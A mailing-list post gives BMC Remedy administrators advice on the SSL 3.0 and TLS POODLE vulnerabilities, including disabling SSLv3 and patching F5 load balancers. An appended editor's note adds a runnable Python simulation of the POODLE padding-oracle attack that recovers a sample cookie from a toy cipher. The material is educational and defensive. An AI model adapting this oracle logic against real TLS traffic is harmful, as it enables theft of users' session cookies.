Here is an update on the SSL 3.0 POODLE and TLS POODLE vulnerabilities.

1. SSL 3.0 "POODLE" Security Vulnerability -- CVE-2014-3566

Please refer to the BMC support site link http://www.bmc.com/support/support-news/SSL_3_0_POODLE_Security_Vulnerability_CVE_2014_3566.html for information about BMC products' updates on the SSL 3.0 "POODLE" Security vulnerability. Information specifically relevant for BMC Remedy AR System and ITSM Suite 7.6.04, 8.0, 8.1, and 8.8 is as follows:

A. See support article https://kb.bmc.com/infocenter/index?page=content&id=S:KA418664 for instructions for disabling SSL V3 in Tomcat used by Mid-Tier.

B. If you are using the LDAP integration plug-in, BMC recommends consulting your LDAP Server documentation for turning off SSL V3 in your LDAP Server. An LDAP plug-in hotfix to allow the LDAP plug-in to use TLS for communication with the LDAP Server will be available by January 31, 2015.

2. TLS POODLE issue with load balancers

- There is a newly reported TLS POODLE vulnerability. Please refer to https://community.qualys.com/blogs/securitylabs/2014/12/08/poodle-bites-tls
- There is a new Critical Vulnerability reported for this issue on F5 load balancers in the MITRE vulnerability database. It appears that the F5 load balancer is vulnerable to this TLS POODLE vulnerability. Please refer to https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8730
- F5 has reacted immediately and posted a hotfix. Please refer to https://support.f5.com/kb/en-us/solutions/public/15000/800/sol15882.html
- It is important to apply the F5 hotfix in case you are using an F5 load balancer.
- In case you are using any other load balancer, check with your load balancer vendor whether it suffers from the TLS POODLE vulnerability and, if so, get a hotfix from your load balancer vendor. Please refer to https://www.imperialviolet.org/2014/12/08/poodleagain.html which lists other load balancer vendors affected by this vulnerability.
- Use the SSL Labs SSL Server Test tool https://www.ssllabs.com/ssltest/ to check your Server for SSL related vulnerabilities.
Regards
---
Abhijit Rajwade
_______________________________________________________________________________
UNSUBSCRIBE or access ARSlist Archives at www.arslist.org "Where the Answers Are, and have been for 20 years"
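Added example (editor's note, not part of the ARSlist post above, nor BMC or F5 code): a self-contained simulation of why the SSL 3.0 record layer (item 1) is exploitable by POODLE and why a TLS stack that skips the padding-byte check (the defect behind the TLS POODLE report in item 2) is just as exposed. The decryptor is run twice: once with the SSL 3.0 rule, which inspects only the last byte of padding, and once with the TLS rule, which requires every padding byte to carry the declared value. Assumptions: a 4-round Feistel network keyed with HMAC-SHA256 stands in for AES/3DES because the Python standard library ships no block cipher; HMAC-SHA256 stands in for the SSL 3.0 MAC; the cookie `session=deadbeef` and the surrounding "A"/"B" request bytes are constructed sample data; each retry gets fresh random keys, modelling the reconnect that follows a fatal alert.

```python
import hashlib
import hmac
import os

BLOCK = 16     # cipher block size; the argument is identical for 8-byte 3DES blocks
MAC_LEN = 32   # HMAC-SHA256 tag length, standing in for the SSL 3.0 MAC

def _f(key, data, n):
    return hmac.new(key, data, hashlib.sha256).digest()[:n]

def block_encrypt(key, block):
    """4-round Feistel network: an invertible 16-byte permutation standing in for AES (assumption)."""
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, bytes(a ^ b for a, b in zip(l, _f(key, bytes([i]) + r, 8)))
    return l + r

def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = bytes(a ^ b for a, b in zip(r, _f(key, bytes([i]) + l, 8))), l
    return l + r

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def cbc_encrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, _xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        c = data[i:i + BLOCK]
        out.append(_xor(block_decrypt(key, c), prev))
        prev = c
    return b"".join(out)

def seal(enc_key, mac_key, iv, plaintext):
    """MAC-then-pad-then-encrypt as in SSL 3.0/TLS 1.0: 1..BLOCK padding bytes, last byte = length - 1.
    A full block of padding is appended when plaintext + MAC is already block aligned."""
    body = plaintext + hmac.new(mac_key, plaintext, hashlib.sha256).digest()
    pad_len = BLOCK - len(body) % BLOCK
    padding = bytes([pad_len - 1]) * pad_len   # TLS-style fill; SSL 3.0 leaves these bytes unspecified
    return cbc_encrypt(enc_key, iv, body + padding)

def open_record(enc_key, mac_key, iv, record, strict):
    """Returns plaintext or None. strict=False: SSL 3.0 rule, only the last byte is checked (also the
    defect in the lenient TLS stacks behind TLS POODLE). strict=True: TLS rule, every padding byte checked."""
    data = cbc_decrypt(enc_key, iv, record)
    pad_len = data[-1] + 1
    if pad_len > BLOCK:
        return None
    if strict and any(b != data[-1] for b in data[-pad_len:]):
        return None
    body = data[:-pad_len]
    plaintext, tag = body[:-MAC_LEN], body[-MAC_LEN:]
    if not hmac.compare_digest(hmac.new(mac_key, plaintext, hashlib.sha256).digest(), tag):
        return None
    return plaintext

SECRET = b"session=deadbeef"   # constructed sample cookie the attacker wants to recover

def poodle_recover(strict, max_tries=8192):
    """Attacker model: controls the bytes before and after SECRET (request path and body), sees the
    ciphertext and whether the server accepts it, never the keys. Returns SECRET against the lenient
    decryptor; None if some byte is never accepted within max_tries (the strict decryptor)."""
    recovered = bytearray()
    for idx in range(len(SECRET)):
        prefix_len = (BLOCK - 1 - idx) % BLOCK                   # park SECRET[idx] last in its block
        target = (prefix_len + idx) // BLOCK                     # index of that plaintext/ciphertext block
        suffix_len = (-(prefix_len + len(SECRET) + MAC_LEN)) % BLOCK  # force a full block of padding
        request = b"A" * prefix_len + SECRET + b"B" * suffix_len
        for _ in range(max_tries):
            enc_key, mac_key, iv = os.urandom(16), os.urandom(16), os.urandom(BLOCK)   # fresh session
            record = seal(enc_key, mac_key, iv, request)
            blocks = [iv] + [record[i:i + BLOCK] for i in range(0, len(record), BLOCK)]  # blocks[j+1] = C_j
            tampered = record[:-BLOCK] + blocks[target + 1]     # replace the padding block with C_target
            if open_record(enc_key, mac_key, iv, tampered, strict) is not None:
                # Accepted, so D(C_target)[-1] ^ C_{n-2}[-1] == BLOCK - 1, and by CBC
                # D(C_target)[-1] == P_target[-1] ^ C_{target-1}[-1]; solve for the plaintext byte.
                recovered.append((BLOCK - 1) ^ blocks[-2][-1] ^ blocks[target][-1])
                break
        else:
            return None
    return bytes(recovered)

if __name__ == "__main__":
    print("SSL 3.0 / lenient TLS padding check:", poodle_recover(strict=False))
    print("strict TLS padding check:", poodle_recover(strict=True, max_tries=512))
```

Each byte costs about 256 reconnects against the lenient decryptor, which is the figure in the POODLE paper; against the strict decryptor the moved block would have to decrypt to sixteen identical bytes, so the loop never succeeds. The check is purely on the server's padding handling, which is why disabling SSL V3 (item 1) and patching lenient TLS stacks on load balancers (item 2) are the two separate actions the post asks for.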

